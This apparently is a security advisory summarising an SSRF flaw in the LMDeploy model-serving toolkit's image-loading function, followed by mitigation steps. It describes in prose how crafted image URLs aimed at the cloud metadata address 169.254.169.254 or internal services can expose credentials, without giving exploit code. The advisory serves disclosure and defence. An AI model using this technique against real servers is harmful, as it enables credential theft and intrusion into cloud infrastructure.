LMDeploy CVE-2026-33626 — SSRF in LLM Serving Toolkit Vision Module
AI relevance: LMDeploy is a widely used toolkit for compressing, deploying, and serving large language models — an SSRF in its vision-language module lets attackers reach cloud metadata endpoints and internal services from any LMDeploy instance processing multimodal inputs.
- CVE-2026-33626 (CVSS 7.5, High) is a Server-Side Request Forgery vulnerability in LMDeploy versions prior to 0.12.3.
- The flaw lives in
lmdeploy/vl/utils.py— theload_image()function fetches arbitrary URLs from user-supplied image references without validating against internal or private IP ranges. - Attackers can craft multimodal prompts with image URLs pointing to
169.254.169.254(AWS/GCP metadata), internal APIs, or other cloud-internal resources. - Because LMDeploy runs as a model-serving backend — often inside the same network as other AI infrastructure components — a successful SSRF can map internal services, steal cloud credentials, or pivot to adjacent systems.
- The vulnerability is remotely exploitable with no authentication required and no user interaction beyond submitting a prompt with a malicious image URL.
- Version 0.12.3 patches the issue by adding IP validation to the URL-fetching logic.
Why it matters
Model serving toolkits like LMDeploy process untrusted multimodal inputs as a core function, making input validation in vision pipelines a critical security boundary. An SSRF in this layer is particularly dangerous because inference servers typically run in cloud environments with rich metadata endpoints and internal service meshes. Combined with the growing trend of multimodal agents that can act on retrieved data, this SSRF could serve as a foothold for broader infrastructure compromise.
What to do
- Upgrade to LMDeploy 0.12.3 or later if you run the toolkit for model serving.
- Restrict outbound network access from model-serving containers to only required model registry and API endpoints — block access to cloud metadata IPs (e.g.,
169.254.169.254). - Audit multimodal pipelines — any component that resolves external URLs from user input should enforce allowlists or block private/metadata IP ranges.
- Run model inference in isolated network segments — don't colocate serving containers with credential-bearing workloads.
Sources: